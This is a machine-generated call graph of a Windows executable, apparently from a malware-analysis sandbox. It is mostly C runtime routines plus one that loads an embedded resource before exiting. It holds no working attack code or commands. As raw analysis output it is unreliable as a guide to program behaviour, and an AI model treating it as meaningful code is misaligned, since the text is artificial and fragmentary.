7099->7104 7109 40649b 7100->7109 7102 407d71 RtlAllocateHeap 7103 407d84 7102->7103 7102->7104 7103->7068 7104->7100 7104->7102 7106 4087b5 7104->7106 7112 4087e1 7106->7112 7123 405ee1 GetLastError 7109->7123 7111 4064a0 7111->7103 7113 4087ed __FrameHandler3::FrameUnwindToState 7112->7113 7118 407596 EnterCriticalSection 7113->7118 7115 4087f8 __InternalCxxFrameHandler 7119 40882f 7115->7119 7118->7115 7122 4075de LeaveCriticalSection 7119->7122 7121 4087c0 7121->7104 7122->7121 7124 405ef7 7123->7124 7127 405efd 7123->7127 7146 4084e1 7124->7146 7143 405f01 SetLastError 7127->7143 7151 408520 7127->7151 7132 405f36 7135 408520 _unexpected 6 API calls 7132->7135 7133 405f47 7134 408520 _unexpected 6 API calls 7133->7134 7136 405f53 7134->7136 7137 405f44 7135->7137 7138 405f57 7136->7138 7139 405f6e 7136->7139 7141 40650b ___free_lconv_mon 12 API calls 7137->7141 7140 408520 _unexpected 6 API calls 7138->7140 7163 405bbe 7139->7163 7140->7137 7141->7143 7143->7111 7145 40650b ___free_lconv_mon 12 API calls 7145->7143 7168 40839e 7146->7168 7148 4084fd 7149 408506 7148->7149 7150 408518 TlsGetValue 7148->7150 7149->7127 7152 40839e _unexpected 5 API calls 7151->7152 7153 40853c 7152->7153 7154 405f19 7153->7154 7155 40855a TlsSetValue 7153->7155 7154->7143 7156 4064ae 7154->7156 7157 4064bb _unexpected 7156->7157 7158 4064fb 7157->7158 7159 4064e6 HeapAlloc 7157->7159 7162 4087b5 _unexpected 2 API calls 7157->7162 7160 40649b ___std_exception_copy 13 API calls 7158->7160 7159->7157 7161 405f2e 7159->7161 7160->7161 7161->7132 7161->7133 7162->7157 7182 405a52 7163->7182 7169 4083ce 7168->7169 7173 4083ca _com_raise_error 7168->7173 7169->7173 7174 4082d3 7169->7174 7172 4083e8 GetProcAddress 7172->7173 7173->7148 7180 4082e4 ___vcrt_FlsFree 7174->7180 7175 408302 LoadLibraryExW 7177 408381 7175->7177 7178 40831d GetLastError 7175->7178 7176 40837a 7176->7172 7176->7173 7177->7176 7179 408393 FreeLibrary 7177->7179 7178->7180 7179->7176 7180->7175 7180->7176 7181 408350 LoadLibraryExW 7180->7181 7181->7177 7181->7180 7183 405a5e __FrameHandler3::FrameUnwindToState 7182->7183 7196 407596 EnterCriticalSection 7183->7196 7185 405a68 7197 405a98 7185->7197 7188 405b64 7189 405b70 __FrameHandler3::FrameUnwindToState 7188->7189 7201 407596 EnterCriticalSection 7189->7201 7191 405b7a 7202 405d45 7191->7202 7193 405b92 7206 405bb2 7193->7206 7196->7185 7200 4075de LeaveCriticalSection 7197->7200 7199 405a86 7199->7188 7200->7199 7201->7191 7203 405d7b _unexpected 7202->7203 7204 405d54 _unexpected 7202->7204 7203->7193 7204->7203 7209 407f82 7204->7209 7319 4075de LeaveCriticalSection 7206->7319 7208 405ba0 7208->7145 7210 407f98 7209->7210 7212 408002 7209->7212 7210->7212 7214 407fcb 7210->7214 7219 40650b ___free_lconv_mon 14 API calls 7210->7219 7213 40650b ___free_lconv_mon 14 API calls 7212->7213 7236 408050 7212->7236 7215 408024 7213->7215 7216 407fed 7214->7216 7224 40650b ___free_lconv_mon 14 API calls 7214->7224 7217 40650b ___free_lconv_mon 14 API calls 7215->7217 7218 40650b ___free_lconv_mon 14 API calls 7216->7218 7220 408037 7217->7220 7221 407ff7 7218->7221 7223 407fc0 7219->7223 7225 40650b ___free_lconv_mon 14 API calls 7220->7225 7228 40650b ___free_lconv_mon 14 API calls 7221->7228 7222 4080be 7229 40650b ___free_lconv_mon 14 API calls 7222->7229 7237 407ad8 7223->7237 7226 407fe2 7224->7226 7227 408045 7225->7227 7265 407bd6 7226->7265 7233 40650b ___free_lconv_mon 14 API calls 7227->7233 7228->7212 7234 4080c4 7229->7234 7231 40650b 14 API calls ___free_lconv_mon 7235 40805e 7231->7235 7233->7236 7234->7203 7235->7222 7235->7231 7277 4080f3 7236->7277 7238 407ae9 7237->7238 7264 407bd2 7237->7264 7239 40650b ___free_lconv_mon 14 API calls 7238->7239 7241 407afa 7238->7241 7239->7241 7240 407b0c 7243 407b1e 7240->7243 7244 40650b ___free_lconv_mon 14 API calls 7240->7244 7241->7240 7242 40650b ___free_lconv_mon 14 API calls 7241->7242 7242->7240 7245 407b30 7243->7245 7246 40650b ___free_lconv_mon 14 API calls 7243->7246 7244->7243 7247 407b42 7245->7247 7248 40650b ___free_lconv_mon 14 API calls 7245->7248 7246->7245 7249 407b54 7247->7249 7250 40650b ___free_lconv_mon 14 API calls 7247->7250 7248->7247 7251 407b66 7249->7251 7252 40650b ___free_lconv_mon 14 API calls 7249->7252 7250->7249 7253 407b78 7251->7253 7254 40650b ___free_lconv_mon 14 API calls 7251->7254 7252->7251 7255 407b8a 7253->7255 7256 40650b ___free_lconv_mon 14 API calls 7253->7256 7254->7253 7257 407b9c 7255->7257 7258 40650b ___free_lconv_mon 14 API calls 7255->7258 7256->7255 7259 407bae 7257->7259 7260 40650b ___free_lconv_mon 14 API calls 7257->7260 7258->7257 7261 407bc0 7259->7261 7262 40650b ___free_lconv_mon 14 API calls 7259->7262 7260->7259 7263 40650b ___free_lconv_mon 14 API calls 7261->7263 7261->7264 7262->7261 7263->7264 7264->7214 7266 407be3 7265->7266 7276 407c3b 7265->7276 7267 407bf3 7266->7267 7268 40650b ___free_lconv_mon 14 API calls 7266->7268 7269 40650b ___free_lconv_mon 14 API calls 7267->7269 7270 407c05 7267->7270 7268->7267 7269->7270 7271 407c17 7270->7271 7272 40650b ___free_lconv_mon 14 API calls 7270->7272 7273 407c29 7271->7273 7274 40650b ___free_lconv_mon 14 API calls 7271->7274 7272->7271 7275 40650b ___free_lconv_mon 14 API calls 7273->7275 7273->7276 7274->7273 7275->7276 7276->7216 7278 408100 7277->7278 7282 40811f 7277->7282 7278->7282 7283 407c64 7278->7283 7281 40650b ___free_lconv_mon 14 API calls 7281->7282 7282->7235 7284 407c75 7283->7284 7318 407d42 7283->7318 7285 407c3f _unexpected 14 API calls 7284->7285 7286 407c7d 7285->7286 7287 407c3f _unexpected 14 API calls 7286->7287 7288 407c88 7287->7288 7289 407c3f _unexpected 14 API calls 7288->7289 7290 407c93 7289->7290 7291 407c3f _unexpected 14 API calls 7290->7291 7292 407c9e 7291->7292 7293 407c3f _unexpected 14 API calls 7292->7293 7294 407cac 7293->7294 7295 40650b ___free_lconv_mon 14 API calls 7294->7295 7296 407cb7 7295->7296 7297 40650b ___free_lconv_mon 14 API calls 7296->7297 7298 407cc2 7297->7298 7299 40650b ___free_lconv_mon 14 API calls 7298->7299 7300 407ccd 7299->7300 7301 407c3f _unexpected 14 API calls 7300->7301 7302 407cdb 7301->7302 7303 407c3f _unexpected 14 API calls 7302->7303 7304 407ce9 7303->7304 7305 407c3f _unexpected 14 API calls 7304->7305 7306 407cfa 7305->7306 7307 407c3f _unexpected 14 API calls 7306->7307 7308 407d08 7307->7308 7309 407c3f _unexpected 14 API calls 7308->7309 7310 407d16 7309->7310 7311 40650b ___free_lconv_mon 14 API calls 7310->7311 7312 407d21 7311->7312 7313 40650b ___free_lconv_mon 14 API calls 7312->7313 7314 407d2c 7313->7314 7315 40650b ___free_lconv_mon 14 API calls 7314->7315 7316 407d37 7315->7316 7317 40650b ___free_lconv_mon 14 API calls 7316->7317 7317->7318 7318->7281 7319->7208 7321 4062f2 7320->7321 7322 406300 7320->7322 7321->7322 7327 40631a 7321->7327 7323 40649b ___std_exception_copy 14 API calls 7322->7323 7324 40630a 7323->7324 7339 4062a0 7324->7339 7326 406314 7326->7090 7327->7326 7328 40649b ___std_exception_copy 14 API calls 7327->7328 7328->7324 7330 404bd3 7329->7330 7331 404c02 7329->7331 7330->7092 7332 404c19 7331->7332 7334 40650b ___free_lconv_mon 14 API calls 7331->7334 7333 40650b ___free_lconv_mon 14 API calls 7332->7333 7333->7330 7334->7331 7336 4062bc 7335->7336 7337 4060a4 __InternalCxxFrameHandler 8 API calls 7336->7337 7338 4062d1 GetCurrentProcess TerminateProcess 7337->7338 7338->7096 7342 4061ec 7339->7342 7343 4061fe ___std_exception_copy 7342->7343 7348 406223 7343->7348 7345 406216 7359 405850 7345->7359 7349 406233 7348->7349 7350 40623a 7348->7350 7365 405890 GetLastError 7349->7365 7355 406248 7350->7355 7369 40607b 7350->7369 7353 40626f 7354 4062b0 ___std_exception_copy 11 API calls 7353->7354 7353->7355 7356 40629f 7354->7356 7355->7345 7357 4061ec ___std_exception_copy 41 API calls 7356->7357 7358 4062ac 7357->7358 7358->7345 7360 40585c 7359->7360 7361 405873 7360->7361 7394 4058e0 7360->7394 7363 405886 7361->7363 7364 4058e0 ___std_exception_copy 41 API calls 7361->7364 7363->7326 7364->7363 7366 4058a9 7365->7366 7372 405f92 7366->7372 7370 406086 GetLastError SetLastError 7369->7370 7371 40609f 7369->7371 7370->7353 7371->7353 7373 405fa5 7372->7373 7374 405fab 7372->7374 7375 4084e1 _unexpected 6 API calls 7373->7375 7376 408520 _unexpected 6 API calls 7374->7376 7393 4058c5 SetLastError 7374->7393 7375->7374 7377 405fc5 7376->7377 7378 4064ae _unexpected 14 API calls 7377->7378 7377->7393 7379 405fd5 7378->7379 7380 405ff2 7379->7380 7381 405fdd 7379->7381 7382 408520 _unexpected 6 API calls 7380->7382 7383 408520 _unexpected 6 API calls 7381->7383 7384 405ffe 7382->7384 7387 405fe9 7383->7387 7385 406011 7384->7385 7386 406002 7384->7386 7390 405bbe _unexpected 14 API calls 7385->7390 7389 408520 _unexpected 6 API calls 7386->7389 7388 40650b ___free_lconv_mon 14 API calls 7387->7388 7388->7393 7389->7387 7391 40601c 7390->7391 7392 40650b ___free_lconv_mon 14 API calls 7391->7392 7392->7393 7393->7350 7395 4058ee GetLastError 7394->7395 7396 40592f 7394->7396 7397 4058fd 7395->7397 7396->7361 7398 405f92 ___std_exception_copy 14 API calls 7397->7398 7399 40591a SetLastError 7398->7399 7399->7396 7400 405936 7399->7400 7403 40579a 7400->7403 7414 40890a 7403->7414 7406 4057aa 7408 4057b4 IsProcessorFeaturePresent 7406->7408 7409 4057d3 7406->7409 7410 4057c0 7408->7410 7450 405033 7409->7450 7444 4060a4 7410->7444 7453 408838 7414->7453 7417 40894f 7420 40895b __FrameHandler3::FrameUnwindToState 7417->7420 7418 405ee1 ___std_exception_copy 14 API calls 7426 40898c __InternalCxxFrameHandler 7418->7426 7419 4089ab 7422 40649b ___std_exception_copy 14 API calls 7419->7422 7420->7418 7420->7419 7421 4089bd __InternalCxxFrameHandler 7420->7421 7420->7426 7423 4089f3 __InternalCxxFrameHandler 7421->7423 7463 407596 EnterCriticalSection 7421->7463 7424 4089b0 7422->7424 7429 408a30 7423->7429 7430 408b2d 7423->7430 7440 408a5e 7423->7440 7427 4062a0 ___std_exception_copy 41 API calls 7424->7427 7426->7419 7426->7421 7443 408995 7426->7443 7427->7443 7429->7440 7464 405d90 GetLastError 7429->7464 7432 408b38 7430->7432 7495 4075de LeaveCriticalSection 7430->7495 7434 405033 __InternalCxxFrameHandler 21 API calls 7432->7434 7436 408b40 7434->7436 7437 405d90 _unexpected 41 API calls 7441 408ab3 7437->7441 7439 405d90 _unexpected 41 API calls 7439->7440 7491 408ad9 7440->7491 7442 405d90 _unexpected 41 API calls 7441->7442 7441->7443 7442->7443 7443->7406 7445 4060c0 _com_raise_error 7444->7445 7446 4060ec IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7445->7446 7447 4061bd _com_raise_error 7446->7447 7497 4018d4 7447->7497 7449 4061db 7449->7409 7505 404ea3 7450->7505 7454 408844 __FrameHandler3::FrameUnwindToState 7453->7454 7459 407596 EnterCriticalSection 7454->7459 7456 408852 7460 408894 7456->7460 7459->7456 7461 4075de __InternalCxxFrameHandler LeaveCriticalSection 7460->7461 7462 40579f 7461->7462 7462->7406 7462->7417 7463->7423 7465 405dac 7464->7465 7466 405da6 7464->7466 7467 408520 _unexpected 6 API calls 7465->7467 7470 405db0 SetLastError 7465->7470 7468 4084e1 _unexpected 6 API calls 7466->7468 7469 405dc8 7467->7469 7468->7465 7469->7470 7472 4064ae _unexpected 14 API calls 7469->7472 7474 405e40 7470->7474 7475 405e45 7470->7475 7473 405ddd 7472->7473 7476 405de5 7473->7476 7477 405df6 7473->7477 7474->7439 7478 40579a CallUnexpected 39 API calls 7475->7478 7480 408520 _unexpected 6 API calls 7476->7480 7481 408520 _unexpected 6 API calls 7477->7481 7479 405e4a 7478->7479 7488 405df3 7480->7488 7482 405e02 7481->7482 7483 405e06 7482->7483 7484 405e1d 7482->7484 7485 408520 _unexpected 6 API calls 7483->7485 7487 405bbe _unexpected 14 API calls 7484->7487 7485->7488 7486 40650b ___free_lconv_mon 14 API calls 7486->7470 7489 405e28 7487->7489 7488->7486 7490 40650b ___free_lconv_mon 14 API calls 7489->7490 7490->7470 7492 408aa5 7491->7492 7493 408add 7491->7493 7492->7437 7492->7441 7492->7443 7496 4075de LeaveCriticalSection 7493->7496 7495->7432 7496->7492 7498 4018dc 7497->7498 7499 4018dd IsProcessorFeaturePresent 7497->7499 7498->7449 7501 401f67 7499->7501 7504 401f2a SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7501->7504 7503 40204a 7503->7449 7504->7503 7506 404ed0 7505->7506 7515 404ee1 7505->7515 7516 401dd4 GetModuleHandleW 7506->7516 7511 404f1f 7523 404d53 7515->7523 7517 401de0 7516->7517 7517->7515 7518 404f84 GetModuleHandleExW 7517->7518 7519 404fc3 GetProcAddress 7518->7519 7520 404fd7 7518->7520 7519->7520 7521 404ff3 7520->7521 7522 404fea FreeLibrary 7520->7522 7521->7515 7522->7521 7524 404d5f __FrameHandler3::FrameUnwindToState 7523->7524 7525 407596 __InternalCxxFrameHandler EnterCriticalSection 7524->7525 7526 404d69 7525->7526 7527 404dbb __InternalCxxFrameHandler 14 API calls 7526->7527 7528 404d76 7527->7528 7529 404d94 __InternalCxxFrameHandler LeaveCriticalSection 7528->7529 7530 404d82 7529->7530 7530->7511 7531 404f3a 7530->7531 7532 404f6b __InternalCxxFrameHandler 5 API calls 7531->7532 7533 404f44 7532->7533 7534 404f58 7533->7534 7535 404f48 GetCurrentProcess TerminateProcess 7533->7535 7536 404f84 __InternalCxxFrameHandler GetModuleHandleExW GetProcAddress FreeLibrary 7534->7536 7535->7534 7537 404f60 ExitProcess 7536->7537 9103 404304 9106 40278d 9103->9106 9107 4027b1 9106->9107 9108 40279f 9106->9108 9110 4029b3 __InternalCxxFrameHandler 51 API calls 9107->9110 9108->9107 9109 4027a7 9108->9109 9111 4027af 9109->9111 9113 4029b3 __InternalCxxFrameHandler 51 API calls 9109->9113 9112 4027b6 9110->9112 9112->9111 9115 4029b3 __InternalCxxFrameHandler 51 API calls 9112->9115 9114 4027cf 9113->9114 9116 4029b3 __InternalCxxFrameHandler 51 API calls 9114->9116 9115->9111 9117 4027da 9116->9117 9118 4056de _unexpected 41 API calls 9117->9118 9119 4027e2 9118->9119 7538 401708 7543 401e16 SetUnhandledExceptionFilter 7538->7543 7540 40170d _com_raise_error 7544 4051cb 7540->7544 7542 401718 7543->7540 7545 4051f1 7544->7545 7546 4051d7 7544->7546 7545->7542 7546->7545 7547 40649b ___std_exception_copy 14 API calls 7546->7547 7548 4051e1 7547->7548 7549 4062a0 ___std_exception_copy 41 API calls 7548->7549 7550 4051ec 7549->7550 7550->7542 7837 406a0a 7838 406a1c 7837->7838 7847 406a18 7837->7847 7839 406a21 7838->7839 7840 406a47 7838->7840 7841 4064ae _unexpected 14 API calls 7839->7841 7840->7847 7848 408685 7840->7848 7843 406a2a 7841->7843 7844 40650b ___free_lconv_mon 14 API calls 7843->7844 7844->7847 7845 406a67 7846 40650b ___free_lconv_mon 14 API calls 7845->7846 7846->7847 7849 408692 7848->7849 7850 4086ad 7848->7850 7849->7850 7852 40869e 7849->7852 7851 4086bc 7850->7851 7857 409dd2 7850->7857 7864 409e05 7851->7864 7854 40649b ___std_exception_copy 14 API calls 7852->7854 7856 4086a3 _com_raise_error 7854->7856 7856->7845 7858 409df2 HeapSize 7857->7858 7859 409ddd 7857->7859 7858->7851 7860 40649b ___std_exception_copy 14 API calls 7859->7860 7861 409de2 7860->7861 7862 4062a0 ___std_exception_copy 41 API calls 7861->7862 7863 409ded 7862->7863 7863->7851 7865 409e12 7864->7865 7866 409e1d 7864->7866 7867 407d48 _com_raise_error 15 API calls 7865->7867 7868 409e25 7866->7868 7874 409e2e _unexpected 7866->7874 7869 409e1a 7867->7869 7870 40650b ___free_lconv_mon 14 API calls 7868->7870 7869->7856 7870->7869 7871 409e33 7873 40649b ___std_exception_copy 14 API calls 7871->7873 7872 409e58 HeapReAlloc 7872->7869 7872->7874 7873->7869 7874->7871 7874->7872 7875 4087b5 _unexpected 2 API calls 7874->7875 7875->7874 9120 40570a 9121 40570d 9120->9121 9122 40579a CallUnexpected 41 API calls 9121->9122 9123 405719 9122->9123 9124 40430e 9130 4042b0 __CallSettingFrame@12 __FrameHandler3::FrameUnwindToState 9124->9130 9125 404350 __FrameHandler3::FrameUnwindToState 51 API calls 9126 404329 9125->9126 9127 40579a CallUnexpected 41 API calls 9126->9127 9128 40432e __FrameHandler3::FrameUnwindToState 9126->9128 9129 404369 9127->9129 9130->9125 9130->9126 9131 402310 9132 40232e __InternalCxxFrameHandler 9131->9132 9143 4022d0 9132->9143 9144 4022e2 9143->9144 9145 4022ef 9143->9145 9146 4018d4 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 9144->9146 9146->9145 9209 409590 9210 4095ca 9209->9210 9211 40649b ___std_exception_copy 14 API calls 9210->9211 9216 4095de 9210->9216 9212 4095d3 9211->9212 9213 4062a0 ___std_exception_copy 41 API calls 9212->9213 9213->9216 9214 4018d4 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 9215 4095eb 9214->9215 9216->9214 8566 401896 8569 401bba 8566->8569 8568 40189b 8568->8568 8570 401bd0 8569->8570 8572 401bd9 8570->8572 8573 401b6d GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8570->8573 8572->8568 8573->8572 9217 402997 9218 4029a1 9217->9218 9219 4029ae 9217->9219 9218->9219 9220 40571a ___std_exception_copy 14 API calls 9218->9220 9220->9219 7551 40171a 7552 401726 __FrameHandler3::FrameUnwindToState 7551->7552 7577 401992 7552->7577 7554 40172d 7555 401880 7554->7555 7566 401757 ___scrt_is_nonwritable_in_current_image __InternalCxxFrameHandler ___scrt_release_startup_lock 7554->7566 7602 401c83 IsProcessorFeaturePresent 7555->7602 7557 401887 7558 40188d 7557->7558 7606 40506f 7557->7606 7560 405033 __InternalCxxFrameHandler 21 API calls 7558->7560 7561 401895 7560->7561 7562 401776 7563 4017f7 7585 401d9e 7563->7585 7565 4017fd 7589 40147b GetModuleHandleW FindResourceW 7565->7589 7566->7562 7566->7563 7595 405049 7566->7595 7578 40199b 7577->7578 7609 40207b IsProcessorFeaturePresent 7578->7609 7582 4019ac 7583 4019b0 7582->7583 7619 4025e9 7582->7619 7583->7554 7679 402470 7585->7679 7587 401db1 GetStartupInfoW 7588 401dc4 7587->7588 7588->7565 7590 40149d GetModuleHandleW LoadResource 7589->7590 7591 4014de ExitProcess 7589->7591 7592 4014d7 FreeResource 7590->7592 7593 4014af LockResource GetModuleHandleW SizeofResource 7590->7593 7592->7591 7593->7592 7594 4014cc 7593->7594 7594->7592 7596 4056de __FrameHandler3::FrameUnwindToState 7595->7596 7597 40505f _com_raise_error 7595->7597 7598 405d90 _unexpected 41 API calls 7596->7598 7597->7563 7601 4056ef 7598->7601 7599 40579a CallUnexpected 41 API calls 7600 405719 7599->7600 7601->7599 7603 401c99 _com_raise_error 7602->7603 7604 401d44 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7603->7604 7605 401d8f _com_raise_error 7604->7605 7605->7557 7607 404ea3 __InternalCxxFrameHandler 21 API calls 7606->7607 7608 405080 7607->7608 7608->7558 7610 4019a7 7609->7610 7611 4025ca 7610->7611 7625 402aa1 7611->7625 7614 4025d3 7614->7582 7616 4025db 7617 4025e6 7616->7617 7639 402add 7616->7639 7617->7582 7620 4025f2 7619->7620 7621 4025fc 7619->7621 7622 402a86 ___vcrt_uninitialize_ptd 6 API calls 7620->7622 7621->7583 7623 4025f7 7622->7623 7624 402add ___vcrt_uninitialize_locks DeleteCriticalSection 7623->7624 7624->7621 7628 402aaa 7625->7628 7627 402ad3 7630 402add ___vcrt_uninitialize_locks DeleteCriticalSection 7627->7630 7628->7627 7629 4025cf 7628->7629 7643 402d1d 7628->7643 7629->7614 7631 402a53 7629->7631 7630->7629 7660 402c2e 7631->7660 7634 402a68 7634->7616 7637 402a83 7637->7616 7640 402b07 7639->7640 7641 402ae8 7639->7641 7640->7614 7642 402af2 DeleteCriticalSection 7641->7642 7642->7640 7642->7642 7648 402b43 7643->7648 7646 402d55 InitializeCriticalSectionAndSpinCount 7647 402d40 7646->7647 7647->7628 7649 402b60 7648->7649 7652 402b64 7648->7652 7649->7646 7649->7647 7650 402bcc GetProcAddress 7650->7649 7652->7649 7652->7650 7653 402bbd 7652->7653 7655 402be3 LoadLibraryExW 7652->7655 7653->7650 7654 402bc5 FreeLibrary 7653->7654 7654->7650 7656 402bfa GetLastError 7655->7656 7657 402c2a 7655->7657 7656->7657 7658 402c05 ___vcrt_FlsFree 7656->7658 7657->7652 7658->7657 7659 402c1b LoadLibraryExW 7658->7659 7659->7652 7661 402b43 ___vcrt_FlsFree 5 API calls 7660->7661 7662 402c48 7661->7662 7663 402c61 TlsAlloc 7662->7663 7664 402a5d 7662->7664 7664->7634 7665 402cdf 7664->7665 7666 402b43 ___vcrt_FlsFree 5 API calls 7665->7666 7667 402cf9 7666->7667 7668 402d14 TlsSetValue 7667->7668 7669 402a76 7667->7669 7668->7669 7669->7637 7670 402a86 7669->7670 7671 402a90 7670->7671 7672 402a96 7670->7672 7674 402c69 7671->7674 7672->7634 7675 402b43 ___vcrt_FlsFree 5 API calls 7674->7675 7676 402c83 7675->7676 7677 402c9b TlsFree 7676->7677 7678 402c8f 7676->7678 7677->7678 7678->7672 7680 402487 7679->7680 7680->7587 7680->7680 8577 40269c 8580 4026ea 8577->8580 8581 4026a7 8580->8581 8582 4026f3 8580->8582 8582->8581 8583 4029b3 __InternalCxxFrameHandler 51 API calls 8582->8583 8584 40272e 8583->8584 8585 4029b3 __InternalCxxFrameHandler 51 API calls 8584->8585 8586 402739 8585->8586 8587 4056de _unexpected 41 API calls 8586->8587 8588 402741 8587->8588 8589 40409e 8592 404220 8589->8592 8591 4040a6 8593 404266 8592->8593 8594 404230 8592->8594 8593->8591 8594->8593 8595 4029b3 __InternalCxxFrameHandler 51 API calls 8594->8595 8596 40425c 8595->8596 8596->8591 9221 40559f 9222 4025e9 ___scrt_uninitialize_crt 7 API calls 9221->9222 9223 4055a6 9222->9223 8597 4028a0 8598 4028b2 8597->8598 8600 4028c0 8597->8600 8599 4018d4 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 8598->8599 8599->8600 9224 4015a0 9227 4015b0 9224->9227 9225 4015d1 9226 4015ca LocalFree 9226->9225 9227->9225 9227->9226 9228 40b1a1 9229 40b1c5 9228->9229 9230 40b216 9229->9230 9232 40b2a1 __startOneArgErrorHandling 9229->9232 9231 40c2c3 15 API calls 9230->9231 9233 40b228 9230->9233 9231->9233 9234 40c860 20 API calls 9232->9234 9235 40c521 __startOneArgErrorHandling 9232->9235 9234->9235 7879 401e22 7880 401e59 7879->7880 7882 401e34 7879->7882 7882->7880 7888 4027e3 7882->7888 7900 4029b3 7888->7900 7891 4027ec 7892 4029b3 __InternalCxxFrameHandler 51 API calls 7891->7892 7893 401e70 7892->7893 7894 4056de 7893->7894 7895 4056ea __FrameHandler3::FrameUnwindToState 7894->7895 7896 405d90 _unexpected 41 API calls 7895->7896 7899 4056ef 7896->7899 7897 40579a CallUnexpected 41 API calls 7898 405719 7897->7898 7899->7897 7914 4029c1 7900->7914 7902 4029b8 7903 401e66 7902->7903 7904 40890a __InternalCxxFrameHandler 2 API calls 7902->7904 7903->7891 7905 40579f 7904->7905 7906 4057aa 7905->7906 7907 40894f __InternalCxxFrameHandler 41 API calls 7905->7907 7908 4057b4 IsProcessorFeaturePresent 7906->7908 7909 4057d3 7906->7909 7907->7906 7910 4057c0 7908->7910 7911 405033 __InternalCxxFrameHandler 21 API calls 7909->7911 7912 4060a4 __InternalCxxFrameHandler 8 API calls 7910->7912 7913 4057dd 7911->7913 7912->7909 7915 4029ca 7914->7915 7916 4029cd GetLastError 7914->7916 7915->7902 7928 402ca4 7916->7928 7919 402a01 7920 402a47 SetLastError 7919->7920 7920->7902 7921 402cdf ___vcrt_FlsSetValue 6 API calls 7922 4029fb __InternalCxxFrameHandler 7921->7922 7922->7919 7923 402a23 7922->7923 7924 402cdf ___vcrt_FlsSetValue 6 API calls 7922->7924 7925 402cdf ___vcrt_FlsSetValue 6 API calls 7923->7925 7926 402a37 7923->7926 7924->7923 7925->7926 7933 40571a 7926->7933 7929 402b43 ___vcrt_FlsFree 5 API calls 7928->7929 7930 402cbe 7929->7930 7931 402cd6 TlsGetValue 7930->7931 7932 4029e2 7930->7932 7931->7932 7932->7919 7932->7920 7932->7921 7934 40650b ___free_lconv_mon 14 API calls 7933->7934 7935 405732 7934->7935 7935->7919 8601 4040a8 8602 4029b3 __InternalCxxFrameHandler 51 API calls 8601->8602 8603 4040b0 __FrameHandler3::FrameUnwindToState 8602->8603 8604 404282 __FrameHandler3::FrameUnwindToState 51 API calls 8603->8604 8605 40412c 8604->8605 8606 404165 __InternalCxxFrameHandler 54 API calls 8605->8606 8607 40414d 8606->8607 9236 4055a8 9239 40560f 9236->9239 9240 405623 9239->9240 9241 4055bb 9239->9241 9240->9241 9242 40650b ___free_lconv_mon 14 API calls 9240->9242 9242->9241 7936 409829 7939 4095de 7936->7939 7937 4018d4 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 7938 4095eb 7937->7938 7939->7937 7939->7939 8608 4098a9 8609 4095de 8608->8609 8610 4018d4 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 8609->8610 8611 4095eb 8610->8611 9243 402faa 9244 4018d4 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 9243->9244 9245 402fbc 9244->9245 9246 403e54 __InternalCxxFrameHandler 54 API calls 9245->9246 9247 402fd5 9246->9247 8612 407aac 8613 407ab1 8612->8613 8615 407ad4 8613->8615 8616 4076bc 8613->8616 8617 4076c9 8616->8617 8621 4076eb 8616->8621 8618 4076e5 8617->8618 8619 4076d7 DeleteCriticalSection 8617->8619 8620 40650b ___free_lconv_mon 14 API calls 8618->8620 8619->8618 8619->8619 8620->8621 8621->8613 7940 401630 7941 401646 _com_error::_com_error 7940->7941 7959 40225b 7941->7959 7943 401654 _com_raise_error 7962 405085 7943->7962 7945 401668 _com_raise_error 7969 4019cb 7945->7969 7947 401c83 _com_raise_error 4 API calls 7949 4016ff _com_raise_error 7947->7949 7948 40167d __RTC_Initialize 7957 4016da _com_raise_error 7948->7957 7975 401b58 7948->7975 7951 401696 _com_raise_error 7951->7957 7978 401c12 InitializeSListHead 7951->7978 7953 4016ac _com_raise_error 7979 401c21 7953->7979 7955 4016cf _com_raise_error 7985 405162 7955->7985 7957->7947 7958 4016f7 7957->7958 7960 4022a2 RaiseException 7959->7960 7961 402275 7959->7961 7960->7943 7961->7960 7963 405094 7962->7963 7964 4050b7 7962->7964 7963->7964 7965 40649b ___std_exception_copy 14 API calls 7963->7965 7964->7945 7966 4050a7 7965->7966 7967 4062a0 ___std_exception_copy 41 API calls 7966->7967 7968 4050b2 7967->7968 7968->7945 7970 4019d7 7969->7970 7971 4019db 7969->7971 7970->7948 7972 401c83 _com_raise_error 4 API calls 7971->7972 7974 4019e8 _com_raise_error ___scrt_release_startup_lock 7971->7974 7973 401a51 7972->7973 7974->7948 7992 401b2b 7975->7992 7978->7953 8027 40567f 7979->8027 7981 401c32 7982 401c39 7981->7982 7983 401c83 _com_raise_error 4 API calls 7981->7983 7982->7955 7984 401c41 7983->7984 7986 405d90 _unexpected 41 API calls 7985->7986 7987 40516d 7986->7987 7988 40649b ___std_exception_copy 14 API calls 7987->7988 7991 4051a5 7987->7991 7989 40519a 7988->7989 7990 4062a0 ___std_exception_copy 41 API calls 7989->7990 7990->7991 7991->7957 7993 401b41 7992->7993 7994 401b3a 7992->7994 8001 40550f 7993->8001 7998 405492 7994->7998 7997 401b3f 7997->7951 7999 40550f _com_raise_error 44 API calls 7998->7999 8000 4054a4 7999->8000 8000->7997 8004 40525b 8001->8004 8005 405267 __FrameHandler3::FrameUnwindToState 8004->8005 8012 407596 EnterCriticalSection 8005->8012 8007 405275 8013 4052b6 8007->8013 8009 405282 8023 4052aa 8009->8023 8012->8007 8014 4052d1 8013->8014 8015 405344 _com_raise_error 8013->8015 8014->8015 8016 405324 8014->8016 8017 408685 _com_raise_error 44 API calls 8014->8017 8015->8009 8016->8015 8018 408685 _com_raise_error 44 API calls 8016->8018 8019 40531a 8017->8019 8020 40533a 8018->8020 8021 40650b ___free_lconv_mon 14 API calls 8019->8021 8022 40650b ___free_lconv_mon 14 API calls 8020->8022 8021->8016 8022->8015 8026 4075de LeaveCriticalSection 8023->8026 8025 405293 8025->7997 8026->8025 8028 40569d _com_raise_error 8027->8028 8032 4056bd _com_raise_error 8027->8032 8029 40649b ___std_exception_copy 14 API calls 8028->8029 8030 4056b3 8029->8030 